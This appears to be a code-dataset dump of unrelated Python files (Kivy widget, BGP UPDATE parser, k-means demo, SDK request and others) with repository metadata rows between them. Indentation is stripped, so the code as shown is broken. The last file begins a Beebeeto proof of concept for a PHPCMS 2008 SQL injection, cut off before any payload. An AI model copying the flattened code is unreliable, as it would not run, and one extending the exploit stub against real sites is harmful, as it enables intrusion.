def on_touch_move(self, touch):
if not touch.grab_current is self:
return
self._touch = False
# skip on tablet mode
if app.ui_mode[0] == 't':
return super(Drawer, self).on_touch_move(touch)
if not touch.ud.get('in_drag_area', None):
return super(Drawer, self).on_touch_move(touch)
ov = self.overlay_widget
ov.x=min(self.hidden_widget.width,
max(ov.x + touch.dx*2, 0))
#_anim = Animation(x=x, duration=1/2, t='in_out_quart')
#_anim.cancel_all(ov)
#_anim.start(ov)
if abs(touch.x - touch.ox) < self.scroll_distance:
return
touch.ud['send_touch_down'] = False
Clock.unschedule(self._change_touch_mode)
self._touch = None
self.state = 'opening' if touch.dx > 0 else 'closing'
touch.ox = touch.x
return
def _change_touch_mode(self, *args):
if not self._touch:
return
touch = self._touch
touch.ungrab(self)
touch.ud['in_drag_area'] = False
touch.ud['send_touch_down'] = False
self._touch = None
super(Drawer, self).on_touch_down(touch)
return
def on_touch_up(self, touch):
if not touch.grab_current is self:
return
self._triigger_gc()
touch.ungrab(self)
touch.grab_current = None
# skip on tablet mode
get = touch.ud.get
if app.ui_mode[0] == 't':
return super(Drawer, self).on_touch_up(touch)
self.old_x = [1, ] * 10
self.speed = sum((
(self.old_x[x + 1] - self.old_x[x]) for x in range(9))) / 9.
if get('send_touch_down', None):
# touch up called before moving
Clock.unschedule(self._change_touch_mode)
self._touch = None
Clock.schedule_once(
lambda dt: super(Drawer, self).on_touch_down(touch))
if get('in_drag_area', None):
if abs(touch.x - touch.ox) < self.scroll_distance:
anim_to = (0 if self.state[0] == 'c'
else self.hidden_widget.width)
Factory.Animation(x=anim_to, d=.1).start(self.overlay_widget)
return
touch.ud['in_drag_area'] = False
if not get('send_touch_down', None):
self.toggle_drawer()
Clock.schedule_once(lambda dt: super(Drawer, self).on_touch_up(touch))
def _complete_drawer_animation(self, *args):
self.state = 'open' if self.state in ('opening', 'closed') else 'closed'
def add_widget(self, widget, index=1):
if not widget:
return
iget = self.ids.get
if not iget('hidden_widget') or not iget('overlay_widget'):
super(Drawer, self).add_widget(widget)
return
if not self.hidden_widget:
self.hidden_widget = self.ids.hidden_widget
if not self.overlay_widget:
self.overlay_widget = self.ids.overlay_widget
if self.overlay_widget.children and self.hidden_widget.children:
Logger.debug('Drawer: Accepts only two widgets. discarding rest')
return
if not self.hidden_widget.children:
self.hidden_widget.add_widget(widget)
else:
self.overlay_widget.add_widget(widget)
widget.x = 0
def remove_widget(self, widget):
if self.overlay_widget.children[0] == widget:
self.overlay_widget.clear_widgets()
return
if widget == self.hidden_widget.children:
self.hidden_widget.clear_widgets()
return
def clear_widgets(self):
self.overlay_widget.clear_widgets()
self.hidden_widget.clear_widgets()
if __name__ == '__main__':
from kivy.app import runTouchApp
from kivy.lang import Builder
runTouchApp(Builder.load_string('''
Drawer:
Button:
Button
'''))
| [
"slowdive@me.com"
] | slowdive@me.com |
5eff08a2a8ac3d7eb32d009fdf49681a45178538 | 6874be4a1382a7a79af829f733155cc1e33f2733 | /numstring.py | 9e352c04a1dca353cb2401c5450b88774f986d4b | [] | no_license | LawerenceLee/classes_PY | 9028604ef835aae8099658c7edfe6b509827e5ce | 440a0efff6ed4cb58a2d7b11e6cc86f49373b0af | refs/heads/master | 2021-07-10T06:34:13.537879 | 2017-10-10T22:09:24 | 2017-10-10T22:09:24 | 106,476,900 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 544 | py | class NumString:
def __init__(self, value):
self.value = str(value)
def __str__(self):
return self.value
def __int__(self):
return int(self.value)
def __float__(self):
return float(self.value)
def __add__(self, other):
if '.' in self.value:
return float(self) + other
return int(self) + other
def __radd__(self, other):
return self + other
def __iadd__(self, other):
self.valve = self + other
return self.value | [
"lucifitz.edward@gmail.com"
] | lucifitz.edward@gmail.com |
2775ffa54c0bc23d1d71871ec34631d79c86c5d8 | ee3039b27532d09c0c435ea7b92e29c70246c66e | /opencv/learnOpencv/091-120/110-KMeans进行数据分类.py | 29e53c58acf946e676b6778afd44438e05fed344 | [] | no_license | Alvazz/fanfuhan_ML_OpenCV | e8b37acc406462b9aaca9c5e6844d1db5aa3c944 | dacfdaf87356e857d3ff18c5e0a4fd5a50855324 | refs/heads/master | 2022-04-05T06:15:31.778227 | 2020-02-07T01:40:07 | 2020-02-07T01:40:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | """
KMeans进行数据分类
"""
import cv2 as cv
import numpy as np
from matplotlib import pyplot as plt
X = np.random.randint(25, 50, (25, 2))
Y = np.random.randint(60, 85, (25, 2))
pts = np.vstack((X, Y))
# 初始化数据
data = np.float32(pts)
print(data.shape)
# 定义停止条件
criteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 10, 1.0)
# kmeans分类
ret, label, center = cv.kmeans(data, 2, None, criteria, 2, cv.KMEANS_RANDOM_CENTERS)
print(label.shape)
print(center)
# 获取不同标签的点
A = data[label.ravel() == 0]
B = data[label.ravel() == 1]
# plot the data
plt.scatter(A[:, 0], A[:, 1])
plt.scatter(B[:, 0], B[:, 1], c='r')
plt.scatter(center[:, 0], center[:, 1], s=80, c='y', marker='s')
plt.xlabel("x1")
plt.ylabel("x2")
plt.show()
cv.waitKey(0)
cv.destroyAllWindows() | [
"gitea@fake.local"
] | gitea@fake.local |
e0080d15f3124eb2541946e99066319f21c9cf29 | e20f478e1ea049e9539c4cbe5535338649651a28 | /music/process/crop.py | 4408f6423f9c18727674889669633690352de910 | [] | no_license | josephding23/RiffGAN | dde35d3f31f8e21d3a1a17ae958085dd8a752163 | f3850a22281fe8344d0db18919f3301d7bc9b55d | refs/heads/master | 2022-12-08T20:26:36.250666 | 2020-09-03T08:17:37 | 2020-09-03T08:17:37 | 269,524,888 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,303 | py | from dataset.grunge_library import *
from music.db_fragments.riff import *
import os
def crop_riffs():
griff_table = get_guitar_riff_table()
briff_table = get_bass_riff_table()
unit_griff_table = get_unit_guitar_riff_table()
unit_briff_table = get_unit_bass_riff_table()
for griff in griff_table.find():
measures_tonality = griff['MeasuresTonality']
path = griff['Path']
guitar_riff = GuitarRiff(path)
cropped_riffs = guitar_riff.crop_by_measure()
if not os.path.exists(path[:-4]):
os.mkdir(path[:-4])
for measure in range(guitar_riff.measures_num):
cropped = cropped_riffs[measure]
save_path = path[:-4] + '/' + str(measure) + '.mid'
cropped.write(path[:-4] + '/' + str(measure) + '.mid')
unit_griff_table.insert_one({
'Performer': griff['Performer'],
'Album': griff['Album'],
'Song': griff['Song'],
'Path': save_path,
'Tonality': measures_tonality[measure]
})
for briff in briff_table.find():
measures_tonality = briff['MeasuresTonality']
path = briff['Path']
bass_riff = BassRiff(path)
cropped_riffs = bass_riff.crop_by_measure()
if not os.path.exists(path[:-4]):
os.mkdir(path[:-4])
for measure in range(bass_riff.measures_num):
cropped = cropped_riffs[measure]
save_path = path[:-4] + '/' + str(measure) + '.mid'
cropped.write(path[:-4] + '/' + str(measure) + '.mid')
unit_briff_table.insert_one({
'Performer': briff['Performer'],
'Album': briff['Album'],
'Song': briff['Song'],
'Path': save_path,
'Tonality': measures_tonality[measure]
})
def test_crop():
path = 'E:/grunge_library/Soundgarden/Superunknown/03 - Fell on Black Days/RIFF/4.mid'
guitar_riff = GuitarRiff(path)
cropped_riffs = guitar_riff.crop_by_measure()
os.mkdir(path[:-4])
for measure in range(guitar_riff.measures_num):
cropped = cropped_riffs[measure]
cropped.write(path[:-4] + '/' + str(measure) + '.mid')
if __name__ == '__main__':
crop_riffs() | [
"dingzhx@vip.qq.com"
] | dingzhx@vip.qq.com |
386d192a0ec7ee09139f82edbcdcc3242ee5d609 | 4766d241bbc736e070f79a6ae6a919a8b8bb442d | /archives/leetcode/0380. Insert Delete GetRandom O(1).py | 49e6f76ec6d3d7f929204d444413ca284bb1fee3 | [] | no_license | yangzongwu/leetcode | f7a747668b0b5606050e8a8778cc25902dd9509b | 01f2edd79a1e922bfefecad69e5f2e1ff3a479e5 | refs/heads/master | 2021-07-08T06:45:16.218954 | 2020-07-18T10:20:24 | 2020-07-18T10:20:24 | 165,957,437 | 10 | 8 | null | null | null | null | UTF-8 | Python | false | false | 2,588 | py | '''
Design a data structure that supports all following operations in average O(1) time.
insert(val): Inserts an item val to the set if not already present.
remove(val): Removes an item val from the set if present.
getRandom: Returns a random element from current set of elements. Each element must have the same probability of being returned.
Example:
// Init an empty set.
RandomizedSet randomSet = new RandomizedSet();
// Inserts 1 to the set. Returns true as 1 was inserted successfully.
randomSet.insert(1);
// Returns false as 2 does not exist in the set.
randomSet.remove(2);
// Inserts 2 to the set, returns true. Set now contains [1,2].
randomSet.insert(2);
// getRandom should return either 1 or 2 randomly.
randomSet.getRandom();
// Removes 1 from the set, returns true. Set now contains [2].
randomSet.remove(1);
// 2 was already in the set, so return false.
randomSet.insert(2);
// Since 2 is the only number in the set, getRandom always return 2.
randomSet.getRandom();
'''
class RandomizedSet(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.datalist=[]
self.datadict={}
def insert(self, val):
"""
Inserts a value to the set. Returns true if the set did not already contain the specified element.
:type val: int
:rtype: bool
"""
if val in self.datadict:
return False
else:
self.datadict[val]=len(self.datalist)
self.datalist.append(val)
return True
def remove(self, val):
"""
Removes a value from the set. Returns true if the set contained the specified element.
:type val: int
:rtype: bool
"""
if val not in self.datalist:
return False
else:
if self.datalist[-1]==val:
self.datalist.pop()
del self.datadict[val]
else:
cur_position=self.datadict[val]
last_val=self.datalist.pop()
del self.datadict[val]
self.datadict[last_val]=cur_position
self.datalist[cur_position]=last_val
return True
def getRandom(self):
"""
Get a random element from the set.
:rtype: int
"""
return random.choice(self.datalist)
# Your RandomizedSet object will be instantiated and called as such:
# obj = RandomizedSet()
# param_1 = obj.insert(val)
# param_2 = obj.remove(val)
# param_3 = obj.getRandom()
| [
"noreply@github.com"
] | yangzongwu.noreply@github.com |
38b7bdf38f9e8eff00eaac099e6aff6c113b5c29 | 057fde8a8ab9622a3524cb880c7ace5a15c0f355 | /set12/116.py | 544622ad13b6a605b28c5b6947e4a09f425bdcfc | [] | no_license | ramyasutraye/Guvi_Python | e9ba6eb812ec8014214dce77d710ce230bbb8020 | 2fed3c460185fbf7bcf64c068084bcdb7d840140 | refs/heads/master | 2020-04-23T19:30:21.003061 | 2018-05-25T10:43:14 | 2018-05-25T10:43:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | n=int(input("Enter n value:"))
k=int(input("Enter k value:"))
print(str(n)+str(k))
| [
"noreply@github.com"
] | ramyasutraye.noreply@github.com |
cf990863204d3924096ace3258291586735811b1 | d5813a3017818b5dff54d283e3ba9a0ceaf5cea9 | /yabgp/message/update.py | d117131e8d6bc8ac7fc3338709e7be2dce1ce6b9 | [
"Apache-2.0"
] | permissive | trungdtbk/yabgp | 12244fa7b23f56951d2a839e0c1706d74d478bd6 | 19850134d1a95f008be4416e495629aa659b55bb | refs/heads/master | 2021-01-22T04:24:31.924393 | 2017-02-10T12:15:33 | 2017-02-10T12:15:33 | 81,541,694 | 0 | 0 | null | 2017-02-10T07:59:27 | 2017-02-10T07:59:27 | null | UTF-8 | Python | false | false | 19,649 | py | # Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""BGP Update Message"""
import struct
import traceback
import logging
import binascii
import netaddr
from yabgp.common import exception as excep
from yabgp.common import constants as bgp_cons
from yabgp.message.attribute import AttributeFlag
from yabgp.message.attribute.origin import Origin
from yabgp.message.attribute.aspath import ASPath
from yabgp.message.attribute.nexthop import NextHop
from yabgp.message.attribute.med import MED
from yabgp.message.attribute.localpref import LocalPreference
from yabgp.message.attribute.atomicaggregate import AtomicAggregate
from yabgp.message.attribute.aggregator import Aggregator
from yabgp.message.attribute.community import Community
from yabgp.message.attribute.originatorid import OriginatorID
from yabgp.message.attribute.clusterlist import ClusterList
from yabgp.message.attribute.mpreachnlri import MpReachNLRI
from yabgp.message.attribute.mpunreachnlri import MpUnReachNLRI
from yabgp.message.attribute.extcommunity import ExtCommunity
from yabgp.message.attribute.pmsitunnel import PMSITunnel
from yabgp.message.attribute.linkstate.linkstate import LinkState
LOG = logging.getLogger()
class Update(object):
"""
An UPDATE message is used to advertise feasible routes that share
common path attributes to a peer, or to withdraw multiple unfeasible
routes from service (RFC 4271 page 15)
"""
def __init__(self):
"""
+----------------------------------------------------+
| Withdrawn Routes Length (2 octets) |
+----------------------------------------------------+
| Withdrawn Routes (variable) |
+----------------------------------------------------+
| Total Path Attribute Length (2 octets) |
+----------------------------------------------------+
| Path Attributes (variable) |
+----------------------------------------------------+
| Network Layer Reachability Information (variable) |
+----------------------------------------------------+
@ Withdrawn Routes Length:
This 2-octets unsigned integer indicates the total length of
the Withdrawn Routes field in octets. Its value allows the
length of the Network Layer Reachability Information field to
be determined, as specified below.
A value of 0 indicates that no routes are being withdrawn from
service, and that the WITHDRAWN ROUTES field is not present in
this UPDATE message.
@ Withdrawn Routes:
This is a variable-length field that contains a list of IP
address prefixes for the routes that are being withdrawn from
service. Each IP address prefix is encoded as a 2-tuple of the
form <length, prefix>, whose fields are described below:
+---------------------------+
| Length (1 octet) |
+---------------------------+
| Prefix (variable) |
+---------------------------+
The use and the meaning of these fields are as follows:
a) Length:
The Length field indicates the length in bits of the IP
address prefix. A length of zero indicates a prefix that
matches all IP addresses (with prefix, itself, of zero
octets).
b) Prefix:
The Prefix field contains an IP address prefix, followed by
the minimum number of trailing bits needed to make the end
of the field fall on an octet boundary. Note that the value
of trailing bits is irrelevant.
@ Total Path Attribute Length:
This 2-octet unsigned integer indicates the total length of the
Path Attributes field in octets. Its value allows the length
of the Network Layer Reachability field to be determined as
specified below.
A value of 0 indicates that neither the Network Layer
Reachability Information field nor the Path Attribute field is
present in this UPDATE message.
@ Path Attributes:
(path attributes details see RFC 4271 and some other RFCs)
@ Network Layer Reachability Information:
This variable length field contains a list of IP address
prefixes. The length, in octets, of the Network Layer
Reachability Information is not encoded explicitly, but can be
calculated as:
UPDATE message Length - 23 - Total Path Attributes Length
- Withdrawn Routes Length
where UPDATE message Length is the value encoded in the fixedsize
BGP header, Total Path Attribute Length, and Withdrawn
Routes Length are the values encoded in the variable part of
the UPDATE message, and 23 is a combined length of the fixedsize
BGP header, the Total Path Attribute Length field, and the
Withdrawn Routes Length field.
Reachability information is encoded as one or more 2-tuples of
the form <length, prefix>, whose fields are described below:
+---------------------------+
| Length (1 octet) |
+---------------------------+
| Prefix (variable) |
+---------------------------+
The use and the meaning of these fields are as follows:
a) Length:
The Length field indicates the length in bits of the IP
address prefix. A length of zero indicates a prefix that
matches all IP addresses (with prefix, itself, of zero
octets).
b) Prefix:
The Prefix field contains an IP address prefix, followed by
enough trailing bits to make the end of the field fall on an
octet boundary. Note that the value of the trailing bits is
irrelevant.
"""
@classmethod
def parse(cls, t, msg_hex, asn4=False, add_path_remote=False, add_path_local=False):
"""
Parse BGP Update message
:param t: timestamp
:param msg_hex: raw message
:param asn4: support 4 bytes AS or not
:param add_path_remote: if the remote peer can send add path NLRI
:param add_path_local: if the local can send add path NLRI
:return: message after parsing.
"""
results = {
"withdraw": [],
"attr": None,
"nlri": [],
'time': t,
'hex': msg_hex,
'sub_error': None,
'err_data': None}
# get every part of the update message
withdraw_len = struct.unpack('!H', msg_hex[:2])[0]
withdraw_prefix_data = msg_hex[2:withdraw_len + 2]
attr_len = struct.unpack('!H', msg_hex[withdraw_len + 2:withdraw_len + 4])[0]
attribute_data = msg_hex[withdraw_len + 4:withdraw_len + 4 + attr_len]
nlri_data = msg_hex[withdraw_len + 4 + attr_len:]
try:
# parse withdraw prefixes
results['withdraw'] = cls.parse_prefix_list(withdraw_prefix_data, add_path_remote)
# parse nlri
results['nlri'] = cls.parse_prefix_list(nlri_data, add_path_remote)
except Exception as e:
LOG.error(e)
error_str = traceback.format_exc()
LOG.debug(error_str)
results['sub_error'] = bgp_cons.ERR_MSG_UPDATE_INVALID_NETWORK_FIELD
results['err_data'] = ''
try:
# parse attributes
results['attr'] = cls.parse_attributes(attribute_data, asn4)
except excep.UpdateMessageError as e:
LOG.error(e)
results['sub_error'] = e.sub_error
results['err_data'] = e.data
except Exception as e:
LOG.error(e)
error_str = traceback.format_exc()
LOG.debug(error_str)
results['sub_error'] = e
results['err_data'] = e
return results
@classmethod
def construct(cls, msg_dict, asn4=False, addpath=False):
"""construct BGP update message
:param msg_dict: update message string
:param asn4: support 4 bytes asn or not
:param addpath: support add path or not
"""
attr_hex = b''
nlri_hex = b''
withdraw_hex = b''
if msg_dict.get('attr'):
attr_hex = cls.construct_attributes(msg_dict['attr'], asn4)
if msg_dict.get('nlri'):
nlri_hex = cls.construct_prefix_v4(msg_dict['nlri'], addpath)
if msg_dict.get('withdraw'):
withdraw_hex = cls.construct_prefix_v4(msg_dict['withdraw'], addpath)
if nlri_hex and attr_hex:
msg_body = struct.pack('!H', 0) + struct.pack('!H', len(attr_hex)) + attr_hex + nlri_hex
return cls.construct_header(msg_body)
elif attr_hex and not nlri_hex:
msg_body = struct.pack('!H', 0) + struct.pack('!H', len(attr_hex)) + attr_hex + nlri_hex
return cls.construct_header(msg_body)
elif withdraw_hex:
msg_body = struct.pack('!H', len(withdraw_hex)) + withdraw_hex + struct.pack('!H', 0)
return cls.construct_header(msg_body)
@staticmethod
def parse_prefix_list(data, addpath=False):
"""
Parses an RFC4271 encoded blob of BGP prefixes into a list
:param data: hex data
:param addpath: support addpath or not
:return: prefix_list
"""
prefixes = []
postfix = data
while len(postfix) > 0:
# for python2 and python3
if addpath:
path_id = struct.unpack('!I', postfix[0:4])[0]
postfix = postfix[4:]
if isinstance(postfix[0], int):
prefix_len = postfix[0]
else:
prefix_len = ord(postfix[0])
if prefix_len > 32:
LOG.warning('Prefix Length larger than 32')
raise excep.UpdateMessageError(
sub_error=bgp_cons.ERR_MSG_UPDATE_INVALID_NETWORK_FIELD,
data=repr(data)
)
octet_len, remainder = int(prefix_len / 8), prefix_len % 8
if remainder > 0:
# prefix length doesn't fall on octet boundary
octet_len += 1
tmp = postfix[1:octet_len + 1]
# for python2 and python3
if isinstance(postfix[0], int):
prefix_data = [i for i in tmp]
else:
prefix_data = [ord(i) for i in tmp]
# Zero the remaining bits in the last octet if it didn't fall
# on an octet boundary
if remainder > 0:
prefix_data[-1] &= 255 << (8 - remainder)
prefix_data = prefix_data + list(str(0)) * 4
prefix = "%s.%s.%s.%s" % (tuple(prefix_data[0:4])) + '/' + str(prefix_len)
if not addpath:
prefixes.append(prefix)
else:
prefixes.append({'prefix': prefix, 'path_id': path_id})
# Next prefix
postfix = postfix[octet_len + 1:]
return prefixes
@staticmethod
def parse_attributes(data, asn4=False):
"""
Parses an RFC4271 encoded blob of BGP attributes into a list
:param data:
:param asn4: support 4 bytes asn or not
:return:
"""
attributes = {}
postfix = data
while len(postfix) > 0:
try:
flags, type_code = struct.unpack('!BB', postfix[:2])
if flags & AttributeFlag.EXTENDED_LENGTH:
attr_len = struct.unpack('!H', postfix[2:4])[0]
attr_value = postfix[4:4 + attr_len]
postfix = postfix[4 + attr_len:] # Next attribute
else: # standard 1-octet length
if isinstance(postfix[2], int):
attr_len = postfix[2]
else:
attr_len = ord(postfix[2])
attr_value = postfix[3:3 + attr_len]
postfix = postfix[3 + attr_len:] # Next attribute
except Exception as e:
LOG.error(e)
error_str = traceback.format_exc()
LOG.debug(error_str)
raise excep.UpdateMessageError(
sub_error=bgp_cons.ERR_MSG_UPDATE_MALFORMED_ATTR_LIST,
data='')
if type_code == bgp_cons.BGPTYPE_ORIGIN:
decode_value = Origin.parse(value=attr_value)
elif type_code == bgp_cons.BGPTYPE_AS_PATH:
decode_value = ASPath.parse(value=attr_value, asn4=asn4)
elif type_code == bgp_cons.BGPTYPE_NEXT_HOP:
decode_value = NextHop.parse(value=attr_value)
elif type_code == bgp_cons.BGPTYPE_MULTI_EXIT_DISC:
decode_value = MED.parse(value=attr_value)
elif type_code == bgp_cons.BGPTYPE_LOCAL_PREF:
decode_value = LocalPreference.parse(value=attr_value)
elif type_code == bgp_cons.BGPTYPE_ATOMIC_AGGREGATE:
decode_value = AtomicAggregate.parse(value=attr_value)
elif type_code == bgp_cons.BGPTYPE_AGGREGATOR:
decode_value = Aggregator.parse(value=attr_value, asn4=asn4)
elif type_code == bgp_cons.BGPTYPE_COMMUNITIES:
decode_value = Community.parse(value=attr_value)
elif type_code == bgp_cons.BGPTYPE_ORIGINATOR_ID:
decode_value = OriginatorID.parse(value=attr_value)
elif type_code == bgp_cons.BGPTYPE_CLUSTER_LIST:
decode_value = ClusterList.parse(value=attr_value)
elif type_code == bgp_cons.BGPTYPE_LINK_STATE:
decode_value = LinkState.parse(value=attr_value).dict()[29]
elif type_code == bgp_cons.BGPTYPE_NEW_AS_PATH:
decode_value = ASPath.parse(value=attr_value, asn4=True)
elif type_code == bgp_cons.BGPTYPE_NEW_AGGREGATOR:
decode_value = Aggregator.parse(value=attr_value, asn4=True)
elif type_code == bgp_cons.BGPTYPE_MP_REACH_NLRI:
decode_value = MpReachNLRI.parse(value=attr_value)
elif type_code == bgp_cons.BGPTYPE_MP_UNREACH_NLRI:
decode_value = MpUnReachNLRI.parse(value=attr_value)
elif type_code == bgp_cons.BGPTYPE_EXTENDED_COMMUNITY:
decode_value = ExtCommunity.parse(value=attr_value)
elif type_code == bgp_cons.BGPTYPE_PMSI_TUNNEL:
decode_value = PMSITunnel.parse(value=attr_value)
else:
decode_value = binascii.b2a_hex(attr_value)
attributes[type_code] = decode_value
return attributes
@staticmethod
def construct_attributes(attr_dict, asn4=False):
"""
construts BGP Update attirubte.
:param attr_dict: bgp attribute dictionary
:param asn4: support 4 bytes asn or not
"""
attr_raw_hex = b''
for type_code, value in attr_dict.items():
if type_code == bgp_cons.BGPTYPE_ORIGIN:
origin_hex = Origin.construct(value=value)
attr_raw_hex += origin_hex
elif type_code == bgp_cons.BGPTYPE_AS_PATH:
aspath_hex = ASPath.construct(value=value, asn4=asn4)
attr_raw_hex += aspath_hex
elif type_code == bgp_cons.BGPTYPE_NEXT_HOP:
nexthop_hex = NextHop.construct(value=value)
attr_raw_hex += nexthop_hex
elif type_code == bgp_cons.BGPTYPE_MULTI_EXIT_DISC:
med_hex = MED.construct(value=value)
attr_raw_hex += med_hex
elif type_code == bgp_cons.BGPTYPE_LOCAL_PREF:
localpre_hex = LocalPreference.construct(value=value)
attr_raw_hex += localpre_hex
elif type_code == bgp_cons.BGPTYPE_ATOMIC_AGGREGATE:
atomicaggregate_hex = AtomicAggregate.construct(value=value)
attr_raw_hex += atomicaggregate_hex
elif type_code == bgp_cons.BGPTYPE_AGGREGATOR:
aggregator_hex = Aggregator.construct(value=value, asn4=asn4)
attr_raw_hex += aggregator_hex
elif type_code == bgp_cons.BGPTYPE_COMMUNITIES:
community_hex = Community.construct(value=value)
attr_raw_hex += community_hex
elif type_code == bgp_cons.BGPTYPE_ORIGINATOR_ID:
originatorid_hex = OriginatorID.construct(value=value)
attr_raw_hex += originatorid_hex
elif type_code == bgp_cons.BGPTYPE_CLUSTER_LIST:
clusterlist_hex = ClusterList.construct(value=value)
attr_raw_hex += clusterlist_hex
elif type_code == bgp_cons.BGPTYPE_MP_REACH_NLRI:
mpreach_hex = MpReachNLRI().construct(value=value)
attr_raw_hex += mpreach_hex
elif type_code == bgp_cons.BGPTYPE_MP_UNREACH_NLRI:
mpunreach_hex = MpUnReachNLRI.construct(value=value)
attr_raw_hex += mpunreach_hex
elif type_code == bgp_cons.BGPTYPE_EXTENDED_COMMUNITY:
community_ext_hex = ExtCommunity.construct(value=value)
attr_raw_hex += community_ext_hex
return attr_raw_hex
@staticmethod
def construct_header(msg):
"""
Prepends the mandatory header to a constructed BGP message
:param msg:
:return:
"""
# 16-octet 2-octet 1-octet
# ---------------+--------+---------+------+
# Maker | Length | Type | msg |
# ---------------+--------+---------+------+
return b'\xff'*16 + struct.pack('!HB', len(msg) + 19, 2) + msg
@staticmethod
def construct_prefix_v4(prefix_list, add_path=False):
"""
constructs NLRI prefix list
:param prefix_list: prefix list
:param add_path: support add path or not
"""
nlri_raw_hex = b''
for prefix in prefix_list:
if add_path and isinstance(prefix, dict):
path_id = prefix.get('path_id')
prefix = prefix.get('prefix')
nlri_raw_hex += struct.pack('!I', path_id)
masklen = prefix.split('/')[1]
ip_hex = struct.pack('!I', netaddr.IPNetwork(prefix).value)
masklen = int(masklen)
if 16 < masklen <= 24:
ip_hex = ip_hex[0:3]
elif 8 < masklen <= 16:
ip_hex = ip_hex[0:2]
elif masklen <= 8:
ip_hex = ip_hex[0:1]
nlri_raw_hex += struct.pack('!B', masklen) + ip_hex
return nlri_raw_hex
| [
"xiaoquwl@gmail.com"
] | xiaoquwl@gmail.com |
30b607ac4c0ea0c052d4efeeabd5863ce8ad5d02 | 854394f4148e7bee8cd3c6d2a01e97ffbf772103 | /0x0A-python-inheritance/100-my_int.py | 4c939bd416117895b5cbd983bf6c85632d952eed | [] | no_license | garethbrickman/holbertonschool-higher_level_programming | cb3ccb864102d62af72b5e86d53638bd899bfabb | 05d65c6c89008cb70cbc1ada5bb9c8ed7a2733e9 | refs/heads/master | 2021-07-10T08:32:23.397388 | 2020-10-15T18:40:55 | 2020-10-15T18:40:55 | 207,379,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | #!/usr/bin/python3
"""
Class for MyInt
"""
class MyInt(int):
"""Defines base class"""
def __init__(self, int):
"""Instantiation"""
super().__init__()
self.int = int
| [
"977@holbertonschool.com"
] | 977@holbertonschool.com |
91daa7e071b04676a4a5ef9324c7c921ce8d1724 | f7ff9607822bb8f347598c10d185941cf1956852 | /aliyun-python-sdk-facebody/aliyunsdkfacebody/request/v20191230/GetBodyPersonRequest.py | 8f62bb24d7e1e9f501ad532c6eb1173a0ec918cd | [
"Apache-2.0"
] | permissive | djzqbx001/aliyun-openapi-python-sdk | 5ca32201c578528f4b4228c7636b36c3f60a7c60 | 7d2e3c854c4d70ed341f036f5f7be0310216c303 | refs/heads/master | 2023-09-06T10:17:55.489439 | 2021-11-19T04:26:37 | 2021-11-19T04:26:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,563 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkfacebody.endpoint import endpoint_data
class GetBodyPersonRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'facebody', '2019-12-30', 'GetBodyPerson')
self.set_method('GET')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_PersonId(self):
return self.get_query_params().get('PersonId')
def set_PersonId(self,PersonId):
self.add_query_param('PersonId',PersonId)
def get_DbId(self):
return self.get_query_params().get('DbId')
def set_DbId(self,DbId):
self.add_query_param('DbId',DbId) | [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
3c3ab58037a0242827c23176c1faadb16196997d | be7bb6d0cbdb27d3ff72830dc9cce41b170b27fe | /0x02-python-import_modules/101-easy_print.py | 0f9d43b5028f6f9044a2a3cf6d6abfff4ba5fdcb | [] | no_license | camagar/holbertonschool-higher_level_programming | 21a8e7c2a2ad07c694c5443e174bb70502f910c2 | 97dd2fade6fb64ac7d9c52e412c0b8c1b8dfc3de | refs/heads/master | 2023-04-07T21:38:00.071687 | 2021-04-14T02:11:42 | 2021-04-14T02:11:42 | 291,889,478 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33 | py | #!/usr/bin/python3
import iscool
| [
"mauriciogrestrepo@gmail.com"
] | mauriciogrestrepo@gmail.com |
d41e07b6b493159c8e8f0b0dbd4c5a75389917d1 | e77a3618d0afe63a2f00d87b61c3f19d3eba10d8 | /plugins/beebeeto/poc_2014_0115.py | dc729f19c5425e035250f73a0c2b0ebc24b7ef11 | [] | no_license | Explorer1092/coco | b54e88a527b29209de7c636833ac5d102514291b | 15c5aba0972ac68dc4c874ddacf5986af5ac2a64 | refs/heads/master | 2020-05-31T07:03:19.277209 | 2019-01-29T14:36:45 | 2019-01-29T14:36:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,141 | py | #!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import re
import urllib2
from baseframe import BaseFrame
class MyPoc(BaseFrame):
poc_info = {
# poc相关信息
'poc': {
'id': 'poc-2014-0115',
'name': 'PHPCMS 2008 /preview.php SQL注入漏洞 POC',
'author': '1024',
'create_date': '2014-10-25',
},
# 协议相关信息
'protocol': {
'name': 'http',
'port': [80],
'layer4_protocol': ['tcp'],
},
# 漏洞相关信息
'vul': {
'app_name': 'PHPCMS',
